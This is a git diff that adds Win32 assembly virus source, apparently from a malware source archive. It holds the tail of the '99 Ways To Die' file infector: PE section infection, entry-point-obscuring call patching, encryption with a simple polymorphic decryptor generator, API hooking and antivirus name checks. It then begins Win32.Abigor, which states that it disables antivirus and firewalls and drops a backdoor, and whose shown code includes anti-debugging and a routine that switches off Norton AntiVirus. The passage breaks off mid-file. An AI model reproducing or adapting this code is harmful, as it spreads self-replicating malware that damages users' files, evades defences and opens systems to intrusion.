+ je infectionErrorCloseUnmap + + add edi,dword ptr [edi+3ch] + cmp eax,edi + ja notValidFile ; avoid fucking headers + add eax,dword ptr [fileSize+ebp] + cmp eax,edi + jb notValidFile ; avoid fucking headers + cmp word ptr [edi],'EP' + jne notValidFile + + mov edx,dword ptr [edi+16h] ; test it's a valid PE + and edx,2h ; i want executable + jz notValidFile + xor edx,edx + mov dx,word ptr [edi+5ch] + dec edx ; i don't want NATIVE + jz notValidFile + + mov edx,edi + + cmp dword ptr [edx+28h],0 ; test code base!=0 + je notValidFile ; this check is for some + ; DLL with no exec code + mov esi,edi + mov eax,18h + add ax,word ptr [edi+14h] + add edi,eax + mov dword ptr [fstSec+ebp],edi + + push edx + mov cx,word ptr [esi+06h] + mov ax,28h + dec cx + mul cx + add edi,eax + pop edx + + test dword ptr [edi+24h],10000000h ; avoid this kind of section + jnz notValidFile ; we can corrupt it! + + mov eax,dword ptr [edi+24h] + and eax,0e0000020h + cmp eax,0e0000020h ; mmm... This is infected yet + je infectionErrorCloseUnmap + + mov eax,dword ptr [edi+10h] ; i rely on the headers... 
+ add eax,dword ptr [edi+14h] + mov dword ptr [fileSize+ebp],eax + + sub eax,dword ptr [edi+14h] ; calc our RVA + add eax,dword ptr [edi+0ch] + mov dword ptr [myRVA+ebp],eax + ; save virus entry point to calc relocations in + ; execution time + add eax,dword ptr [esi+34h] + mov dword ptr [virusEP+ebp],eax + + call searchEPO ; Search for a call + jc notValidFile + + push edi edx ecx ; patch the call + mov edx,dword ptr [myRVA+ebp] + add edx,dword ptr [esi+34h] ; edx = dest rva + mov edi,dword ptr [EPORva+ebp] + add edi,dword ptr [esi+34h] ; edi = call rva + sub edx,edi + sub edx,5 ; edx patch the call + mov ecx,dword ptr [EPOAddr+ebp] + xchg dword ptr [ecx+1],edx + add edx,edi ; get the rva + add edx,5 + mov dword ptr [hostRET+ebp],edx ; and store it ;) + pop ecx edx edi + + mov eax,dword ptr [edi+08h] ; fix the virtual size + push edx ; if needed + mov ecx,dword ptr [edx+38h] ; some PE have strange + xor edx,edx ; virt size (cdplayer p.e.) + div ecx + inc eax + or edx,edx + jz rvaFixDone + xor edx,edx + mul ecx + + mov dword ptr [edi+08h],eax ; save the fixed virt size +rvaFixDone: + + ; save image base for hook API + mov edx,dword ptr [esi+34h] + mov dword ptr [imageBase+ebp],edx + pop edx + + push edx ; calc the new virtual size + mov eax,BUFFERSIZE ; for the section + add eax,vSize + mov ecx,dword ptr [edx+38h] + xor edx,edx + div ecx + inc eax + xor edx,edx + mul ecx + pop edx + + add dword ptr [edi+08h],eax ; fix the virtual size + add dword ptr [edx+50h],eax ; fix the image size + + or dword ptr [edi+24h],0e0000020h ; set the properties + + push edx ; calc new size for + mov eax,dword ptr [gensize+ebp] ; the section + mov ecx,dword ptr [edx+3ch] + xor edx,edx + div ecx + inc eax + xor edx,edx + mul ecx + pop edx + + add dword ptr [edi+10h],eax ; store the phys size + + mov edi,dword ptr [edx+80h] ; get RVA Import + xor ecx,ecx + mov cx,word ptr [edx+06h] ; number of sections + mov esi,dword ptr [fstSec+ebp] ; get 1st section addr + +impSectionLoop: ; look for 
import section + mov ebx,dword ptr [esi+0ch] + add ebx,dword ptr [esi+08h] ; test it's inside this + cmp edi,ebx ; section + jb impSectionFound + add esi,28h + dec ecx + jnz impSectionLoop + +impSectionFound: + or dword ptr [esi+24h],80000000h ; make writable + + push edx ; calc file padding + mov ecx,PADDING ; (infection sign) + add eax,dword ptr [fileSize+ebp] + xor edx,edx + div ecx + inc eax + xor edx,edx + mul ecx + mov dword ptr [pad+ebp],eax + pop edx + + ; update the virus sample ready to infect. + call updateVSample + + push dword ptr [mapMem+ebp] + call dword ptr [_UnmapViewOfFile+ebp] + + push dword ptr [fhmap+ebp] + call dword ptr [_CloseHandle+ebp] + + xor eax,eax + push eax + push dword ptr [pad+ebp] + push eax + push 00000004h + push eax + push dword ptr [fHnd+ebp] + call dword ptr [_CreateFileMappingA+ebp] + or eax,eax + jz infectionErrorClose + + mov dword ptr [fhmap+ebp],eax + + xor eax,eax + push dword ptr [pad+ebp] + push eax + push eax + push 00000004h OR 00000002h + push dword ptr [fhmap+ebp] + call dword ptr [_MapViewOfFile+ebp] + or eax,eax + jz infectionErrorCloseMap + + mov dword ptr [mapMem+ebp],eax + + mov ecx,dword ptr [gensize+ebp] + mov esi,dword ptr [memHnd+ebp] + mov edi,eax + add edi,dword ptr [fileSize+ebp] + rep movsb + + xchg ecx,eax ; I want the padding + mov eax,edi ; to be zeroes... 
+ sub eax,ecx + mov ecx,dword ptr [pad+ebp] + sub ecx,eax + xor eax,eax + rep stosb + + ; update the PE checksum + mov ecx,dword ptr [pad+ebp] + inc ecx + shr ecx,1 + mov esi,dword ptr [mapMem+ebp] + call CheckSumMappedFile ; calc partial check sum + add esi,dword ptr [esi+3ch] ; goto begin of nt header + mov word ptr [pchcks+ebp],ax + mov edx,1 ; complete the check sum + mov ecx,edx + mov ax,word ptr [esi+58h] + cmp word ptr [pchcks+ebp],ax + adc ecx,-1 + sub word ptr [pchcks+ebp],cx + sub word ptr [pchcks+ebp],ax + mov ax,word ptr [esi+5ah] + cmp word ptr [pchcks+ebp],ax + adc edx,-1 + sub word ptr [pchcks+ebp],dx + sub word ptr [pchcks+ebp],ax + movzx ecx,word ptr [pchcks+ebp] + add ecx,dword ptr [pad+ebp] + mov dword ptr [esi+58h],ecx ; set new check sum + + dec byte ptr [infCount+ebp] ; another infection + +infectionErrorCloseUnmap: + push dword ptr [mapMem+ebp] + call dword ptr [_UnmapViewOfFile+ebp] + +infectionErrorCloseMap: + push dword ptr [fhmap+ebp] + call dword ptr [_CloseHandle+ebp] + + lea edi,fileTime2+ebp + push edi + lea edi,fileTime1+ebp + push edi + lea edi,fileTime0+ebp + push edi + push dword ptr [fHnd+ebp] + call dword ptr [_SetFileTime+ebp] + +infectionErrorClose: + push dword ptr [fHnd+ebp] + call dword ptr [_CloseHandle+ebp] + +infectionErrorAttrib: + push dword ptr [fileAttrib+ebp] + push dword ptr [fNameAddr+ebp] + call dword ptr [_SetFileAttributesA+ebp] + +infectionError: + popad + ret +; +; Here the virus marks the file as no valid. This avoids later re-check +; the file in next executions of virus. Notice the infected files are not +; marked, for this issue i use size padding and test last section properties +; in second instance. Avers will find this mark in files that the virus +; doesn't want ;) +; +notValidFile: + mov edi,dword ptr [mapMem+ebp] + mov word ptr [edi+12h],'(:' ; checked but not valid! + jmp infectionErrorCloseUnmap + +; +; This my 'search EPO' routine. 
Searches for a call into the code section +; that points to: +; +; push ebp +; mov ebp,esp +; +; This is the way the high level languages get the arguments from a call +; of a procedure. If this code is found i assume the call found it's +; correct and i patch it to jump into the virus. +; +searchEPO: + pushad + mov edi,dword ptr [esi+28h] ; get host EP + + xor ecx,ecx + mov cx,word ptr [esi+06h] ; number of sections + mov esi,dword ptr [fstSec+ebp] ; get 1st section addr + +sectionLoop: ; look for code section + mov ebx,dword ptr [esi+0ch] + add ebx,dword ptr [esi+08h] ; test it's inside this + cmp edi,ebx ; section + jb sectionFound + add esi,28h + dec ecx + jnz sectionLoop + stc + jmp searchEPOOut + +sectionFound: + test dword ptr [esi+24h],10000000h ; avoid this kind of section + jnz searchEPOFail ; we can corrupt it! + + push esi + sub edi,dword ptr [esi+0ch] ; get raw address + add edi,dword ptr [esi+14h] + mov ecx,dword ptr [esi+10h] + cmp ecx,edi + jna searchEPOFail + sub ecx,edi + add edi,dword ptr [mapMem+ebp] + mov ebx,edi + add ebx,ecx + sub ebx,10h ; high secure fence +callLoop: ; loop that searches + cmp byte ptr [edi],0e8h ; for the call + jne continueCallLoop + mov edx,edi + add edx,dword ptr [edi+1] + add edx,5 + cmp ebx,edx + jb continueCallLoop + cmp edx,dword ptr [mapMem+ebp] + jb continueCallLoop + mov esi,edx + mov dx,word ptr [esi] + cmp dx,08b55h + jne continueCallLoop + mov dx,word ptr [esi+1] + cmp dx,0ec8bh + jne continueCallLoop + mov dword ptr [EPOAddr+ebp],edi + sub edi,dword ptr [mapMem+ebp] + pop esi + add edi,dword ptr [esi+0ch] ; get rva address + sub edi,dword ptr [esi+14h] + mov dword ptr [EPORva+ebp],edi + clc + jmp searchEPOOut +continueCallLoop: + inc edi + loop callLoop +searchEPOFail: + pop esi + stc +searchEPOOut: + popad + ret +; +; Updates the virus sample ready to infect in our memory buffer. 
+; +updateVSample: + lea edx,dateTime+ebp + push edx + call dword ptr [_GetSystemTime+ebp] + + lea esi,dateTime+ebp ; save month-1 + xor eax,eax + mov ax,word ptr [esi+2] + dec eax + or eax,eax + jnz storeCountdown + + add eax,12 + +storeCountdown: + mov word ptr [countdown+ebp],ax + + lea esi,vBegin+ebp ; update integrity check + mov edi,vSize-4 ; using CRC32 + call CRC32 + mov dword ptr [myCRC32+ebp],eax + + xor dword ptr [hostRET+ebp],eax ; hide hostEP + + lea esi,vBegin+ebp ; copy virus body + mov edi,dword ptr [memHnd+ebp] + mov ecx,vSize + rep movsb + + mov ecx,dword ptr [CodeSize+ebp] ; encrypt virus body + mov esi,5 + add esi,dword ptr [memHnd+ebp] + mov eax,dword ptr [CrptKey+ebp] +encrptLoop: + xor dword ptr [esi],eax + + test byte ptr [CrptFlags+ebp],F_SADD ; slide add? + jz crptNoSADD + + mov edx,dword ptr [CrptKey+ebp] + not edx + add eax,edx +crptNoSADD: + test byte ptr [CrptFlags+ebp],F_SSUB ; slide sub? + jz crptNoSSUB + + mov edx,dword ptr [CrptKey+ebp] + rol edx,4 + sub eax,edx +crptNoSSUB: + add esi,4 + loop encrptLoop + ret +; +; [99WATLEN] 99 WAys To Lame ENgine +; +; This is the lame poly engine of this time :( +; It's only a way to not put fixed decryptors... +; Notice it doesn't add garbage instructions. +; +; EAX: CrptKey +; ECX: CodeSize +; EDI: Destination address +; +; returns EAX: size of generated proc +; +; : eax edx ebx ecx esi edi +; : eax edx ebx ecx esi edi - { } +; <*Imm32>: Random immediate value +; ?? op ??: Op could be here (or not ;) +; +; push ebp +; mov ebp,esp +; push +; push +; mov , +; mov , +; mov ebp,[ebp+4] +;theloop: +; xor [ebp], +; ?? add , ?? +; ?? sub , ?? 
+; add ebp,4 +; sub ,1 +; jne theloop +; pop +; pop +; pop ebp +; ret +; +GenDCrpt: + pushad ; setup regs status + xor eax,eax + lea edi,RegStatus+ebp + mov ecx,9 + rep stosb + popad + mov byte ptr [RegStatus+ebp+_EBP],1 + mov byte ptr [RegStatus+ebp+_ESP],1 + mov dword ptr [CrptKey+ebp],eax + mov dword ptr [CodeSize+ebp],ecx + mov byte ptr [CrptFlags+ebp],al + xor byte ptr [CrptFlags+ebp],ah + + xor eax,eax + push edi + + mov cl,_EBP + call AddPushREG + + mov ax,0ec8bh + stosw + + call GetReg + mov byte ptr [KeyReg+ebp],al + + mov cl,al + call AddPushREG + + call GetReg + mov byte ptr [LoopReg+ebp],al + + mov cl,al + call AddPushREG + + mov cl,byte ptr [KeyReg+ebp] + mov edx,dword ptr [CrptKey+ebp] + call AddMovREGINM + + mov cl,byte ptr [LoopReg+ebp] + mov edx,dword ptr [CodeSize+ebp] + call AddMovREGINM + + mov edx,04h + mov cl,_EBP + call AddMovREGMEMEBP + + push edi + + mov cl,byte ptr [KeyReg+ebp] + call AddXorMEMEBPREG + + test byte ptr [CrptFlags+ebp],F_SADD + jz noSADD + + mov cl,byte ptr [KeyReg+ebp] + mov edx,dword ptr [CrptKey+ebp] + not edx + call AddAddREGINM + +noSADD: + test byte ptr [CrptFlags+ebp],F_SSUB + jz noSSUB + + mov cl,byte ptr [KeyReg+ebp] + mov edx,dword ptr [CrptKey+ebp] + rol edx,4 + call AddSubREGINM + +noSSUB: + mov cl,_EBP + mov edx,04h + call AddAddREGINM + + mov cl,byte ptr [LoopReg+ebp] + mov edx,1 + call AddSubREGINM + + pop ebx + mov eax,edi + sub eax,ebx + push eax + mov al,75h + stosb + pop eax + mov ah,0feh + xchg al,ah + sub al,ah + stosb + + mov cl,byte ptr [LoopReg+ebp] + call AddPopREG + + mov al,byte ptr [LoopReg+ebp] + call FreeReg + + mov cl,byte ptr [KeyReg+ebp] + call AddPopREG + + mov cl,_EBP + call AddPopREG + + mov al,0c3h + stosb + + pop esi + sub edi,esi + mov eax,edi + ret + +; +; Poly engine data +; +_EAX equ 0 +_ECX equ 1 +_EDX equ 2 +_EBX equ 3 +_ESP equ 4 +_EBP equ 5 +_ESI equ 6 +_EDI equ 7 +F_SADD equ 1 or 4 +F_SSUB equ 2 or 4 +RegStatus db 8 dup(0) +CrptFlags db 0 +KeyReg db 0 +LoopReg db 0 +CrptKey dd 0 
+CodeSize dd 0 + +; +; returns AL: selected register +; +GetReg: + xor eax,eax + mov al,byte ptr [CrptKey+ebp] +GetReg1: + and al,7 + lea ecx,RegStatus+ebp + add ecx,eax + mov dl,byte ptr [ecx] + or dl,dl + jz GetReg0 + inc al + jmp GetReg1 +GetReg0: + mov byte ptr [ecx],1 + ret + +; +; AL: selected register to free +; +FreeReg: + and eax,7 + lea ecx,RegStatus+ebp + add ecx,eax + mov byte ptr [ecx],0 + ret + +; +; Instruction generators +; +; EDI: Destination code +; ECX: Reg (if applicable) +; EDX: Inm (if applicable) +; + +AddPushREG: + mov al,050h + add al,cl + stosb + ret + +AddPopREG: + mov al,058h + add al,cl + stosb + ret + +AddMovREGINM: + mov al,0b8h + add al,cl + stosb + mov eax,edx + stosd + ret + +AddMovREGMEMEBP: + mov al,08bh + stosb + mov al,08h + mul cl + add al,85h + stosb + mov eax,edx + stosd + ret + +AddXorMEMEBPREG: + mov al,031h + stosb + mov al,08h + mul cl + add al,45h + stosb + xor al,al + stosb + ret + +AddAddREGINM: + or cl,cl + jnz AddAddREGINM0 + mov al,05h + stosb + jmp AddAddREGINM1 +AddAddREGINM0: + mov al,081h + stosb + mov al,0c0h + add al,cl + stosb +AddAddREGINM1: + mov eax,edx + stosd + ret + +AddSubREGINM: + or cl,cl + jnz AddSubREGINM0 + mov al,2dh + stosb + jmp AddSubREGINM1 +AddSubREGINM0: + mov al,081h + stosb + mov al,0e8h + add al,cl + stosb +AddSubREGINM1: + mov eax,edx + stosd + ret +; +; This is our func that does the partial check sum of the file. I know it +; must be improved... 
but i'm so lazy :( (still lazy) +; +; in: ecx (fileSize+1) shr 2 +; esi offset mappedFile +; +; out: eax partial checksum of file +; +CheckSumMappedFile: + push esi + xor eax, eax + shl ecx, 1 + je func0_saltito0 + test esi, 00000002h + je func0_saltito1 + sub edx, edx + mov dx, word ptr [esi] + add eax, edx + adc eax, 00000000h + add esi, 00000002h + sub ecx, 00000002h + +func0_saltito1: + mov edx, ecx + and edx, 00000007h + sub ecx, edx + je func0_saltito2 + test ecx, 00000008h + je func0_saltito3 + add eax, dword ptr [esi] + adc eax, dword ptr [esi+04h] + adc eax, 00000000h + add esi, 00000008h + sub ecx, 00000008h + je func0_saltito2 + +func0_saltito3: + test ecx, 00000010h + je func0_saltito4 + add eax, dword ptr [esi] + adc eax, dword ptr [esi+04h] + adc eax, dword ptr [esi+08h] + adc eax, dword ptr [esi+0Ch] + adc eax, 00000000h + add esi, 00000010h + sub ecx, 00000010h + je func0_saltito2 + +func0_saltito4: + test ecx, 00000020h + je func0_saltito5 + add eax, dword ptr [esi] + + adc eax, dword ptr [esi+04h] + adc eax, dword ptr [esi+08h] + adc eax, dword ptr [esi+0Ch] + adc eax, dword ptr [esi+10h] + adc eax, dword ptr [esi+14h] + adc eax, dword ptr [esi+18h] + adc eax, dword ptr [esi+1Ch] + adc eax, 00000000h + add esi, 00000020h + sub ecx, 00000020h + je func0_saltito2 + +func0_saltito5: + test ecx, 00000040h + je func0_saltito6 + add eax, dword ptr [esi] + + adc eax, dword ptr [esi+04h] + adc eax, dword ptr [esi+08h] + adc eax, dword ptr [esi+0Ch] + adc eax, dword ptr [esi+10h] + adc eax, dword ptr [esi+14h] + adc eax, dword ptr [esi+18h] + adc eax, dword ptr [esi+1Ch] + adc eax, dword ptr [esi+20h] + adc eax, dword ptr [esi+24h] + adc eax, dword ptr [esi+28h] + adc eax, dword ptr [esi+2Ch] + adc eax, dword ptr [esi+30h] + adc eax, dword ptr [esi+34h] + adc eax, dword ptr [esi+38h] + adc eax, dword ptr [esi+3Ch] + adc eax, 00000000h + add esi, 00000040h + sub ecx, 00000040h + je func0_saltito2 + +func0_saltito6: + add eax, dword ptr [esi] + + adc eax, 
dword ptr [esi+04h] + adc eax, dword ptr [esi+08h] + adc eax, dword ptr [esi+0Ch] + adc eax, dword ptr [esi+10h] + adc eax, dword ptr [esi+14h] + adc eax, dword ptr [esi+18h] + adc eax, dword ptr [esi+1Ch] + adc eax, dword ptr [esi+20h] + adc eax, dword ptr [esi+24h] + adc eax, dword ptr [esi+28h] + adc eax, dword ptr [esi+2Ch] + adc eax, dword ptr [esi+30h] + adc eax, dword ptr [esi+34h] + adc eax, dword ptr [esi+38h] + adc eax, dword ptr [esi+3Ch] + adc eax, dword ptr [esi+40h] + adc eax, dword ptr [esi+44h] + adc eax, dword ptr [esi+48h] + adc eax, dword ptr [esi+4Ch] + adc eax, dword ptr [esi+50h] + adc eax, dword ptr [esi+54h] + adc eax, dword ptr [esi+58h] + adc eax, dword ptr [esi+5Ch] + adc eax, dword ptr [esi+60h] + adc eax, dword ptr [esi+64h] + adc eax, dword ptr [esi+68h] + adc eax, dword ptr [esi+6Ch] + adc eax, dword ptr [esi+70h] + adc eax, dword ptr [esi+74h] + adc eax, dword ptr [esi+78h] + adc eax, dword ptr [esi+7Ch] + adc eax, 00000000h + add esi, 00000080h + sub ecx, 00000080h + jne func0_saltito6 + +func0_saltito2: + test edx, edx + je func0_saltito0 + +func0_saltito7: + sub ecx, ecx + mov cx, word ptr [esi] + add eax, ecx + adc eax, 00000000h + add esi, 00000002h + sub edx, 00000002h + jne func0_saltito7 + +func0_saltito0: + mov edx, eax + shr edx, 10h + and eax, 0000FFFFh + add eax, edx + mov edx, eax + shr edx, 10h + add eax, edx + and eax, 0000FFFFh + pop esi + ret +; +; Virus data --------------------------------------------------------------- +; +HOOKTABLEBEGIN label byte + dd offset _CreateFileA + dd offset Hook0 + dd offset _MoveFileA + dd offset Hook1 + dd offset _CopyFileA + dd offset Hook2 + dd offset _CreateProcessA + dd offset Hook3 + dd offset _SetFileAttributesA + dd offset Hook4 + dd offset _GetFileAttributesA + dd offset Hook5 + dd offset _SearchPathA + dd offset Hook6 + dd offset _SetCurrentDirectoryA + dd offset Hook7 +HOOKTABLEEND label byte + +FSTAPI label byte +CrcCreateFileA dd 08c892ddfh + db 12 +_CreateFileA dd 0 + 
+CrcMapViewOfFile dd 0797b49ech + db 14 +_MapViewOfFile dd 0 + +CrcCreatFileMappingA dd 096b2d96ch + db 19 +_CreateFileMappingA dd 0 + +CrcUnmapViewOfFile dd 094524b42h + db 16 +_UnmapViewOfFile dd 0 + +CrcCloseHandle dd 068624a9dh + db 12 +_CloseHandle dd 0 + +CrcFindFirstFileA dd 0ae17ebefh + db 15 +_FindFirstFileA dd 0 + +CrcFindNextFileA dd 0aa700106h + db 14 +_FindNextFileA dd 0 + +CrcFindClose dd 0c200be21h + db 10 +_FindClose dd 0 + +CrcVirtualAlloc dd 04402890eh + db 13 +_VirtualAlloc dd 0 + +CrcGetTickCount dd 0613fd7bah + db 13 +_GetTickCount dd 0 + +CrcGetFileTime dd 04434e8feh + db 12 +_GetFileTime dd 0 + +CrcSetFileTime dd 04b2a3e7dh + db 12 +_SetFileTime dd 0 + +CrcSetFileAttributesA dd 03c19e536h + db 19 +_SetFileAttributesA dd 0 + +CrcGetFileAttributesA dd 0c633d3deh + db 19 +_GetFileAttributesA dd 0 + +CrcGetFileSize dd 0ef7d811bh + db 12 +_GetFileSize dd 0 + +CrcGetSystemTime dd 075b7ebe8h + db 14 +_GetSystemTime dd 0 + +CrcMoveFileA dd 02308923fh + db 10 +_MoveFileA dd 0 + +CrcCopyFileA dd 05bd05db1h + db 10 +_CopyFileA dd 0 + +CrcCreateProcessA dd 0267e0b05h + db 15 +_CreateProcessA dd 0 + +CrcSearchPathA dd 0f4d9d033h + db 12 +_SearchPathA dd 0 + +CrcGetCurrentDirectoryA dd 0ebc6c18bh + db 21 +_GetCurrentDirectoryA dd 0 + +CrcSetCurrentDirectoryA dd 0b2dbd7dch + db 21 +_SetCurrentDirectoryA dd 0 + +CrcGetWindowsDirectoryA dd 0fe248274h + db 21 +_GetWindowsDirectoryA dd 0 +ENDAPI label byte +; AV: AVP, PAV, NAV, ... +; AN: SCAN, VISUSSCAN, ... +; DR: DRWEB +; ID: SPIDER +; OD: NOD-ICE +; TB: THUNDERBYTE... (this still exists?) +; F-: F-PROT, ... +avStrings dw 'VA','NA','RD','DI','DO','BT','-F' +vStringsCout equ (offset $-offset avStrings)/2 +fndMask db '*.*',0 + +copyright db '< 99 Ways To Die Coded by Bumblebee/29a >' + +; Following value cannot be included in self check CRC32... +myCRC32 dd 0 +vEnd label byte +; +; virus ENDS HERE +; +crypt: +; +; Temp data. Not stored into the file, only 1st generation. 
+; +BUFFERBEGIN label byte +stringBuffer: ret + db STRINGTOP-1 dup(0) +tmpPath db STRINGTOP dup(0) +currentPath db STRINGTOP dup(0) +address dd 0 +names dd 0 +ordinals dd 0 +nexports dd 0 +expcount dd 0 +memHnd dd 0 + +fHnd dd 0 +fhmap dd 0 +mapMem dd 0 +infCount db 0 + +fileSize dd 0 +fileAttrib dd 0 +fileTime0 dd 0,0 +fileTime1 dd 0,0 +fileTime2 dd 0,0 +pad dd 0 +fNameAddr dd 0 +gensize dd 0 +myRVA dd 0 +fstSec dd 0 +find_data WIN32_FIND_DATA <0> +findHnd dd 0 +semHook db 0 +EPORva dd 0 +EPOAddr dd 0 +dateTime db 16 dup(0) +payload db 0 +pchcks dw 0 +BUFFEREND label byte +BUFFERSIZE equ BUFFEREND-BUFFERBEGIN + +; +; Fake host for 1st generation +; +fakeHost: + push 1000h +title: @strz "(C) 2000 Bumblebee/29a" +mess: @strz "99 Ways To Die activated. Have a nice day." + push 0h + call MessageBoxA + + push 0h + call ExitProcess + +Ends +End inicio +; +; hi sweet! +; +; ' the preacher said, richer or poorer +; my mama said, thick or thin +; you can kiss me, baby +; when it's time to get thick again ' +; +; + diff --git a/Win32/Win32.Abigor.ASM b/Win32/Win32.Abigor.ASM new file mode 100644 index 00000000..1f539607 --- /dev/null +++ b/Win32/Win32.Abigor.ASM 
@@ -0,0 +1,8857 @@ +; ******************** +; * Win32.Abigor * +; ******************** +; +; It is a polymorphic PE file appending win32 virus that uses EPO. +; It is also my first virus attempt. +; +; here is some of it's feature : +; +;* Infect filez on execution (via registry hooking), and directly the system and windows folder +; (1st execution only) +;* Patch all occurence of ExitProcess, exit and _exit so the virus runs when the hosts terminates +; +;* After some time, it will disable AVz and firewall by patching their entry point with a "ret", +; deleting their service. Then it drops it's backdoor component. +; +;* Randomly trashes the system by blocking exe'z execution, this has 1/1000 chances to happen +; when an exe is executed and it is during "generaly" until the system reboots. +; . +; . +; . +; (well it's not a feature, it's a bug ! :D) +; +; +; +; +; +; +; +; +; Well... no more talking here's the code -> + + .586 + .model flat, stdcall + option casemap :none ; case sensitive + + + include \masm32\include\windows.inc + include \masm32\include\kernel32.inc + includelib \masm32\lib\kernel32.lib + +__DBG_ON__ equ FALSE ; TRUE : disable anti-debugging feature FALSE : enable anti-debugging feature +__RELEASE_MODE__ equ TRUE ; FALSE : does not infect windows and system TRUE : does infect win & sys dir + +%out +%out Virus Version INFO: +%out +IF __DBG_ON__ + + %out * Anti-debugging feature DISABLED + +ELSE + %out * Anti-debugging feature ENABLED + +ENDIF + +IF __RELEASE_MODE__ + + %out * DOES infect windows & system directory on 1st execution + %out * Anti-AV routines ENABLED +ELSE + + %out * DOES NOT infect windows & system directory on 1st execution + %out * Anti-AV routines DISABLED + +ENDIF + +%out + +.data + + +templ db "%lx",0 ; DEBUG 1st gen + +db 0 + + +.data? +buf db 256 dup (?) ; DEBUG 1st gen + +.code + + ALIGN 4 + start: + xor ebx , ebx +jmp VirusStart +hehe:invokE ExitProcess,0 ; 1st gen. 
+VirusStart: + + + + + rept 8 + nop + ENDM + cld + + + Call ___Delta + ___Delta: + pop ebp + sub ebp, OFFSET ___Delta + + + + + and dword ptr [ebp + Patched?],0 ; init error + +assume fs:nothing + + mov dword ptr [ebp + @@Delta],ebp ; Delta to restore if General error + mov dword ptr [ebp + @@@Delta],ebp ; Delta to restore if Kernel base access error + + + lea eax,[exception_handler+ebp] + push eax + + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + + + + + + mov esi, dword ptr [ebp + _KERNEL32] ; try with last used kernel + Call GetK32 + or eax,eax + jnz @F + + mov esi,0BFF70000h ; Win9x + Call GetK32 ; ... + or eax,eax + jnz @F + mov esi,077E40000h ; XP + Call GetK32 ; GetKernel + or eax,eax + jnz @F + + mov esi,077E00000h ; NT/W2k + Call GetK32 + or eax,eax + jnz @F + mov esi,077E80000h ; NT/W2k + Call GetK32 + or eax,eax + jnz @F + mov esi,077ED0000h ; NT/W2k + Call GetK32 + or eax,eax + jnz @F + mov esi,077F00000h ; NT/W2k + Call GetK32 + + + @@: + + mov dword ptr [ebp+_KERNEL32],eax ; Save kernel base + + Call GetGetProcAddressAddress ; hum... 
+ + IFE __DBG_ON__ ; enable debugging for test only + + mov eax, dword ptr [ebp + _GetProcAddress] + cmp byte ptr [eax], 0CCh + jz ZeroShit + + lea eax, dword ptr [ebp + szIsDebuggerPresent] + push eax + push dword ptr [ebp+_KERNEL32] + Call dword ptr [ebp + _GetProcAddress] + + + .IF eax == 0 ; -> win95 + mov ecx,fs:[20h] + jecxz @F + jmp ZeroShit ; quit if debugger found + @@: + .ELSE ; -> win98, NT, 2k, XP + CAll EAX + or eax, eax + jz @F + jmp ZeroShit ; quit if debugger found + @@: + .ENDIF + + ENDIF + + push 3 + lea eax, dword ptr [ebp + szSetErrorMode] + Call K32Api + + lea eax,[EnableHostExecutionOnError_handlder+ebp] ; Setup SEH frame for poly error handling + push eax + mov dword ptr [ebp + EnableHostExecutionOnError_Delta],ebp ; Save Delta + mov dword ptr [ebp + EnableHostExecutionOnError_Stack],esp ; Save Stack + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + + sub esp, SIZEOF OSVERSIONINFO + mov ebx, esp + assume ebx : ptr OSVERSIONINFO + mov dword ptr [ebx].dwOSVersionInfoSize, SIZEOF OSVERSIONINFO + push ebx + lea eax, dword ptr [ebp + szGetVersionExA] + Call K32Api + push dword ptr [ebx].dwPlatformId + pop dword ptr [ebp + WinVer] + add esp, SIZEOF OSVERSIONINFO + + assume ebx : NOTHING + + lea eax, dword ptr [ebp + Advapi32] + push eax + lea eax, dword ptr [ebp + szLoadLibraryA] + Call K32Api + mov dword ptr [ebp + _ADVAPI32], eax + + lea eax, dword ptr [ebp + Psapi] + push eax + lea eax, dword ptr [ebp + szLoadLibraryA] + Call K32Api + mov dword ptr [ebp + _PSAPI], eax + + lea eax, dword ptr [ebp + SFC] + push eax + lea eax, dword ptr [ebp + szLoadLibraryA] + Call K32Api + mov dword ptr [ebp + hSFC], eax + + lea eax,dword ptr [ebp + USER32] + push eax + lea eax,dword ptr [ebp+szLoadLibraryA] + Call K32Api + mov dword ptr [ebp+_USER32],eax ; Save user32 base + + lea eax,dword ptr [ebp + Shell32] + push eax + lea eax,dword ptr [ebp+szLoadLibraryA] + Call K32Api + mov dword ptr [ebp+_Shell32],eax ; Save user32 base + + + + + 
Call Random_init ; init rng seeds + + + ;CALL SetupRegHook ; install virus + + IF __RELEASE_MODE__ + + sub esp, 120 + mov ebx, esp + mov dword ptr [ebp + CompNameSize], 100 + lea eax, dword ptr [ebp + CompNameSize] + push eax + push ebx + ;lea eax, dword ptr [ebp + szGetComputerNameA] ; ERR_NOACCESS ??? + ;Call K32Api + lea eax, dword ptr [ebp + szGetUserNameA] + Call ADVAPI32Api + lea edi, dword ptr [ebp + OldCompName] + mov esi, ebx + mov eax, ebx + call _strlen + mov ecx, eax + mov edx, ecx + repz cmpsb + and byte ptr [ebp + NewSystem],0 + test ecx, ecx + jz CmpInfTime ; not a new system: abort massive infection + + ;####################### executed ONLY once on 1st infection ##################### + + mov esi, ebx + lea edi, dword ptr [ebp + OldCompName] ; store old computer name for further checking + xchg ecx, edx + rep movsb + + + lea eax, dword ptr [ebp + InfectionTime] ; retrieve 1st infection time on this computer + push eax + lea eax, dword ptr [ebp + szGetSystemTimeAsFileTime] + Call K32Api + + lea eax,[win_infect_handlder+ebp] ; Setup SEH frame for poly error handling + push eax + mov dword ptr [ebp + win_infectDelta],ebp ; Save Delta + mov dword ptr [ebp + win_infectStack],esp ; Save Stack + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + + inc byte ptr [ebp + NewSystem] + + xor esi, esi + lea eax, dword ptr [ebp + NAV_Win] + push eax + push esi + lea eax, dword ptr [ebp + szFindWindowA] + Call U32Api + mov dword ptr [ebp + hNAVWnd], eax + or eax, eax + jz @F + + push esi + push 9c42h ; Desactivate NAV + push WM_COMMAND + push eax + lea eax, dword ptr [ebp + szSendMessageA] + Call U32Api + @@: + + + Call infect_newsystem ; ensure perenniality on new system & sleep for some day + + + mov ecx, dword ptr [ebp + hNAVWnd] + jecxz @F + + push 0 + push 9c42h ; Restore NAV + push WM_COMMAND + push ecx + lea eax, dword ptr [ebp + szSendMessageA] + Call U32Api + @@: + + + win_infect_handlder: + DB 0BCh + win_infectStack dd 00000000h ; 
